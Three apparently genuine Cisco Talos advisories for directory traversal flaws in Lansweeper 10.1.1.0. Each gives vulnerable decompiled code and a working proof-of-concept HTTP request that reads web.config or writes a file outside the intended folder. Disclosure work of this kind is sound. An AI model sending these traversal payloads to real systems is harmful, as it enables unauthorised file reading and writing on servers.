
2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32763: TALOS-2022-1541 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the TicketTemplateActions.aspx GetTemplateAttachment functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the TicketTemplateActions.aspx GetTemplateAttachment functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Helpdesk -> choose any ticket -> Template [editor window] -> Edit any template and is located inside \LS\CF\Helpdesk\TicketTemplateActions.cs file. Let us take a close look at the vulnerable source code:

    Line 19			private static void GetTemplateAttachment(HttpContext c)
    Line 20			{
    Line 21				try
    Line 22				{
    Line 23					if (!User.Current().IsInRole(Permission.EditConfiguration) && !User.Current().IsAgent())
    Line 24					{
    Line 25						throw new CustomException("Access denied");
    Line 26					}
    Line 27					string fileuid = c.Request["fileuid"].Trim();
    Line 28					int num = int.Parse(c.Request["templateid"]);
    Line 29					string path = LSFolder.HelpdeskTemplateFiles.GetPath();
    Line 30					string text2 = $"{path.TrimEnd('\\')}\\_{num}_{fileuid}";
    Line 31					if (!File.Exists(text2))
    Line 32					{
    Line 33						throw new CustomException("file not found on fileserver...");
    Line 34					}
    Line 35					c.Response.Clear();
    Line 36					c.Response.AddHeader("Content-Disposition", "attachment; filename=\"" + fileuid + "\"");
    Line 37					c.Response.ContentType = "application/octet-stream";
    Line 38					c.Response.TransmitFile(text2);
    Line 39					c.Response.Flush();		
    

When a user is trying to edit the ticket template, the above code is responsible for reading all included attachments in that template. fileuid is a variable representing part of filename which should be read at line 27 and returned to the user. Because an attacker can fully control fileuid, and there is a lack of any sanitization in a context of directory traversal, we can jump out of the default path helpdesk template files at line 30 and read any file on the server.

**Exploit Proof of Concept**

REQUEST

    GET /helpdesk/TicketTemplateActions.aspx?action=gettemplateattachment&fileuid=..\..\..\..\web.config&templateid=2 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: image/avif,image/webp,*/*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://192.168.0.102:81/helpdesk/Ticket.aspx?tid=22
    Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: application/octet-stream
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    Content-Disposition: attachment; filename="..\..\..\..\web.config"
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 08 Jun 2022 07:49:02 GMT
    Connection: close
    Content-Length: 5325
    
    <?xml version="1.0" encoding="utf-8"?>
    <configuration>
        <configSections>
            <section name="featureToggles" type="System.Configuration.AppSettingsSection, System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
        </configSections>
        <featureToggles></featureToggles>
        <appSettings>
            <add key="DirectoryJS" value="js/release/"/>
            <add key="DirectoryCSS" value="css/"/>
            <add key="aspnet:MaxJsonDeserializerMembers" value="990000"/>
            <add key="HdUpdateThread" value="1"/>
        </appSettings>
        <connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">
      <EncryptedData>
       <CipherData>
        <CipherValue>AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA31f9e/ZQ4kKBRCakjPYZswQAAAACAAAAAAAQZgAAAAEAACAAAADHiSF/lzluyvw7Lx88aWP0YcJz96SHNANFVZyH9VYLeAAAAAAOgAAAAAIAACAAAABdVGpiG5NeQIsMrZWl5UxXE2bmTAKTQCbtBRphzgXkYOACAADIdJ1gVyXQ+GywixA+DJ6q4yux1jEg3jRLpyFOnLlaZ4ZZ5dp94/HqA9plP5HPftaBinrcP99FSDwGi9CmnU58Behn0AGaU52Pw2UyiQprE8C679JejGlM9FqYQu6gyNPkzQdg1pzk6enJqBcJkLsQEHsJuZz0h7+Goh7faP4CI3qv6yQO/E3hqCZ3E4PibFZ1wWRUKFxA4azzhPaGzCJuohNT1B5QmBitgIRNUEpC8ZYTGanGaelaVdmQqYK13sxHuD6YUxOMGmvqjCdrVjioONvodc3LIX+16Tio9/Gew4E0edgfamp3Wg+5nL2045cKwT4StVtGLF42rkBq4zxq8CSnyiFw0YRH0fvGHL4h0A5aMvsWOVsCRc9Ri6tpPETSeXwdhUkScwterWVtX4Uf8mBneYxWpsIaf7Wc4jwV8LfWuhHvo+j4nSdoMPKnPeFE8I6FcfqDq2aAqHAf+XBBhMNAvHSWdgJ8UZDJx6AEu2RKvWy/eUf9DSJXsxy+umirDLTs0N6WK0XmsTqyYo89HYHBZZrUYKssiitXA3YJPXgJxbmXacO14GKRXRSQKo7TgrhRFRQjKdeT6XU4AZI99qlpX2ShiNfDbAZY+LJEJ9H+sGw2SI7iINlv6nBF5IJUgNnPsCUrHC0aqMmJuKOyZFrNMhMipci+af8pGGI62DOjXYznoFQ/SH7bWTPeE29YYux7gMeqFwVsXdmbIiy6j6cdwIiYZRda56TmffUkfIWLWI3KHwCt7nMBva0D55liKsmRU5ERvxMB4a9jTI/zs6NuCznJTBCN7GCOBbmUuENK5yxQCNEFhzrU/dFdCO0ABD/7A+wCuJOkTYOnjSGdybfOC/o4vNzc9TM7flJEKVwL4p7wsqSisTa7XX27VHOmzQzLPltkCmDc6l0572o03iEvqArTlqtboo9sgsI9qPLveEDW/tysSe+bjd5A1W9jhzRwU6hvMMUi+MCDyP8OQAAAAF4tuT8k20AfzCREvqjQ/I4bhkuoGi2FXPL0rGfTovef2uDhcytpOlA6mDeCsCWtDWb/2qzUB1VRPhVs4QIvfKo=</CipherValue>
       </CipherData>
      </EncryptedData>
     </connectionStrings>
        <runtime>
            <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
                <dependentAssembly>
                    <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral"/>
                    <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0"/>
                </dependentAssembly>
                <dependentAssembly>
                    <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral"/>
                    <bindingRedirect oldVersion="0.0.0.0-2.0.8.0" newVersion="2.0.8.0"/>
                </dependentAssembly>
            </assemblyBinding>
        </runtime>
        <system.web>
            <httpRuntime maxRequestLength="201900" executionTimeout="600" requestValidationMode="2.0"/>
            <authentication mode="Windows"/>
            <identity impersonate="false"/>
            <compilation debug="true" defaultLanguage="C#" strict="false" explicit="true" targetFramework="4.0">
                <assemblies>
                    <remove assembly="Microsoft.VisualStudio.Web.PageInspector.Loader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
                    <remove assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <remove assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <remove assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <remove assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <remove assembly="System.DirectoryServices.AccountManagement, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <add assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <add assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <add assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <add assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                    <add assembly="System.DirectoryServices.AccountManagement, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
                </assemblies>
            </compilation>
        </system.web>
        <system.webServer>
            <validation validateIntegratedModeConfiguration="false"/>
            <security>
                <requestFiltering>
                    <verbs allowUnlisted="true">
                        <add verb="TRACE" allowed="false"/>
                        <add verb="OPTIONS" allowed="false"/>
                    </verbs>
                    <hiddenSegments>
                        <add segment="templatefiles"/>
                    </hiddenSegments>
                    <requestLimits maxAllowedContentLength="1147483648"/>
                </requestFiltering>
            </security>
            <httpErrors errorMode="Custom">
                <remove statusCode="404"/>
                <error statusCode="404" path="/404.aspx" responseMode="ExecuteURL"/>
                <remove statusCode="500"/>
                <error statusCode="500" path="/500.aspx" responseMode="ExecuteURL"/>
            </httpErrors>
            <staticContent>
                <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="1.00:00:00"/>
            </staticContent>
        </system.webServer>
        <location path="api.aspx">
            <system.webServer>
                <security>
                    <authentication>
                        <anonymousAuthentication enabled="true"/>
                    </authentication>
                </security>
            </system.webServer>
            <system.web>
                <authorization>
                    <allow users="*"/>
                </authorization>
            </system.web>
        </location>
    </configuration>
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-27498: TALOS-2022-1531 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Helpdesk -> choose any ticket -> Template [editor window] -> Edit any template -> add inline file and is located inside the LS\WS\HelpdeskActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	private static void EditTemplate()
    Line 2 	{
    Line 3 		HttpContext current = HttpContext.Current;
    Line 4 		Page page = (Page)HttpContext.Current.Handler;
    Line 5 		JsReturnObject jsReturnObject = new JsReturnObject();
    Line 6 		int num = int.Parse(current.Request["id"]);
    Line 7 		string text = current.Request["templatetext"];
    Line 8 		string text2 = current.Request["name"];
    Line 9 		int value = int.Parse(current.Request["templatecategory"]);
    Line 10		bool flag = false;
    Line 11		HttpFileCollection files = current.Request.Files;
    Line 12		
    Line 13				for (int m = 1; m <= int.Parse(current.Request["inlineattachmentste"]); m++)
    Line 14				{
    Line 15					int num2 = (current.Request["inlineattachment" + m] ?? "").IndexOf("base64");
    Line 16					if (current.Request["inlineattachment" + m] == null || num2 <= 0)
    Line 17					{
    Line 18						continue;
    Line 19					}
    Line 20					string path = LSFolder.HelpdeskTemplateFiles.GetPath();
    Line 21					
    Line 22					byte[] array2 = Convert.FromBase64String(current.Request["inlineattachment" + m].Substring(num2 + 7));
    Line 23					string text7 = num + "_" + current.Request["inlineattachmentname" + m];
    Line 24					try
    Line 25					{
    Line 26						FileStream fileStream = new FileStream(path + text7, FileMode.CreateNew, FileAccess.Write, FileShare.None);
    Line 27						try
    Line 28						{
    Line 29							fileStream.Write(array2, 0, array2.Length);
    Line 30							flag = true;
    Line 31						}
    Line 32						finally
    Line 33						{
    Line 34							((IDisposable)fileStream).Dispose();
    Line 35						}
    Line 36					}
    Line 37					catch
    Line 38					{
    Line 39					}
    Line 40				}			
    

Creating a ticket template, a user is able to add to it inline files inlineattachment. Each inline file entry has its own name, inlineattachmentname. inlineattachmentname is not sanitized at all in a context of directory traversal, and it is further concatenated in a simple way with a path to helpdesk template files directory line 26. Lack of a proper inlineattachmentname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

**Exploit Proof of Concept**

REQUEST

    POST /helpdesk/HelpdeskActions.aspx?action=edittemplate&id=2 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------12029611817265063291319576436
    Content-Length: 2156
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/helpdesk/ticket.aspx?nonew=-7&tid=24
    Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    Upgrade-Insecure-Requests: 1
    
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="__VIEWSTATE"
    
    
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="name"
    
    Approval
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="templatetext"
    
    <span><img style="max-width: 950px;" src="/helpdesk/TicketTemplateActions.aspx?action=gettemplateattachment&amp;fileuid=cat123.jpg&amp;templateid=2" alt="cat123.jpg"></span>Thank you, we have received your request.<div><br></div><div>After we got an approval we will execute all required steps in order to provide what you need. We kindly ask for your patience until someone from the helpdesk will contact you.</div><div><br></div><div>In case we would need further information, this ticket will be assigned back to you in state "Awaiting Reply". Please provide necessary details as soon as possible in order to ensure swift processing.</div>
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="templatecategory"
    
    1
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="inlineattachment1"
    
    data:application/octet-stream;base64,WW91IGhhdmUgYmVlbiAwd24zZCE=
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="inlineattachmentname1"
    
    ..\..\..\..\..\..\..\HACKED.jpg
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="inlineattachment3"
    
    data:text/plain;base64,dmVyc2lvbj0xOS4wLjAKY2xpZW50PWZpcmViYXNlLWFuYWx5dGljcwpmaXJlYmFzZS1hbmFseXRpY3NfY2xpZW50PTE5LjAuMAo=
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="inlineattachmentname3"
    
    firebase-analytics.jpg
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="inlineattachmentste"
    
    3
    -----------------------------12029611817265063291319576436
    Content-Disposition: form-data; name="filestodelete"
    
    
    -----------------------------12029611817265063291319576436--
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Tue, 07 Jun 2022 13:32:56 GMT
    Connection: close
    Content-Length: 173
    
    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["Approval","1","True"]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-29517: TALOS-2022-1529 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the KnowledgebasePageActions.aspx ImportArticles functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the KnowledgebasePageActions.aspx ImportArticles functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Knowledgebase -> Import Articles and is located inside the \LS\WS\KnowledgebasePageActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	private static void ImportArticles()
    Line 2 	{
    Line 3 		General.ValidateCsrf();
    Line 4 		HttpContext current = HttpContext.Current;
    Line 5 		string text = "";
    Line 6 		bool flag = false;
    Line 7 		HttpPostedFile httpPostedFile = current.Request.Files[0];
    Line 8 		string text2 = "";
    Line 9 		List<string[]> list = new List<string[]>();
    Line 10		current.Response.Clear();
    Line 11		int num = 0;
    Line 12		List<int> list2 = new List<int>();
    Line 13		Dictionary<int, string> dictionary = new Dictionary<int, string>();
    Line 14		List<int> list3 = new List<int>();
    Line 15		if (httpPostedFile.ContentLength > 0)
    Line 16		{
    Line 17			try
    Line 18			{
    Line 19				if (Path.GetExtension(httpPostedFile.FileName).ToLower() != ".csv")
    Line 20				{
    Line 21					text2 += "Only file extension .csv allowed.";
    Line 22					throw new CustomException(text2);
    Line 23				}
    Line 24				using (Stream stream = httpPostedFile.InputStream)
    Line 25				{
    Line 26					list = General.ParseCSV(stream, -1);
    Line 27				}		
    Line 28				string category = list[0][0].ToLower().Trim();
    Line 29				string title = list[0][1].ToLower().Trim();
    Line 30				string text3 = list[0][2].ToLower().Trim();
    Line 31				string file_attachments = list[0][3].ToLower().Trim();
    Line 35				if (!(category == "category") || !(title == "title") || !(file_attachments == "attachments") || !(text3 == "text"))
    Line 36				{
    Line 37					throw new ArgumentException("The CSV-file has a wrong format.");
    Line 38				}
    Line 39			(...)			
    Line 40			
    Line 41					for (int j = 1; j < list.Count; j++)
    Line 42					{
    Line 43						try
    Line 44						{
    Line 45							category = list[j][0];
    Line 46							title = HtmlSanitizer.SanitizeHtml(list[j][1]);
    Line 47							text3 = HtmlSanitizer.SanitizeHtml(list[j][2]);
    Line 48							file_attachments = list[j][3];
    Line 50							List<string> file_attachments_array = file_attachments.Split(new string[1] { "|" }, StringSplitOptions.RemoveEmptyEntries).ToList();
    Line 55							foreach (string file_path in file_attachments_array)
    Line 56							{
    Line 57								SaveImportFile(file_path, id);
    Line 58							}				
    Line 59		
    Line 60			(...)
    Line 61						private static void SaveImportFile(string filePath, int id)
    Line 62						{
    Line 63							General.ValidateCsrf();
    Line 64							int num = 0;
    Line 65							using (FileStream stream = File.OpenRead(filePath))
    Line 66							{
    Line 67								num = GlobalActions.SaveImage(stream);
    Line 68							}
    

The Import Articles functionality allows a user to upload a CSV formatted file with the following entries:

    Category,Title,Text,Attachments	
    

Where attachments can contain a path to the file located on the server, which should be copied and be available through the web interface as an integral part of imported article line 31. The lansweeper web interface suggests that a file pointed in such way should be available to the “Everyone” group on the server. Unfortunately, it is hard to find any privilege drop or privilege check before a pointed file is read. file_path is not sanitized, which gives the possibility to an attacker to read any file located on the server lines 55-68.

**Exploit Proof of Concept**

REQUEST

    POST /Knowledgebase/KnowledgebasePageActions.aspx?action=importarticles HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------376375159424554480053455199395
    Content-Length: 656
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/Knowledgebase/KnowledgebaseOptions/ImportKnowledgebase.aspx
    Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    
    -----------------------------376375159424554480053455199395
    Content-Disposition: form-data; name="importFile"; filename="test.csv"
    Content-Type: text/csv
    
    Category,Title,Text,Attachments
    Lansweeper,SPECIAL2,Some description.,"c:\Program Files (x86)\Lansweeper\Website\web.config" 
    
    -----------------------------376375159424554480053455199395
    Content-Disposition: form-data; name="__RequestVerificationToken"
    
    WBGmiL05NSOQqPgcOXOfecOQiG9Std6V3tZBBrMAn3AGkU9n5BFgUrwIrtqFgqOCZJmDxAAusQvUTxBcjyuB67bKT2ra2w+zjMjHiP9cac/I2zGI16E9a5zXnIWBm+2TS2ni776KRYyWqd36Km1eqMOMraOXjhdv8hXXuf2PjMU=
    -----------------------------376375159424554480053455199395--
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Tue, 07 Jun 2022 15:58:27 GMT
    Connection: close
    Content-Length: 92
    
    { "error":false, "rowerrors" : [] , "message":"", "success":1, "failure":0, "failedRows":""}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

Tag

#cisco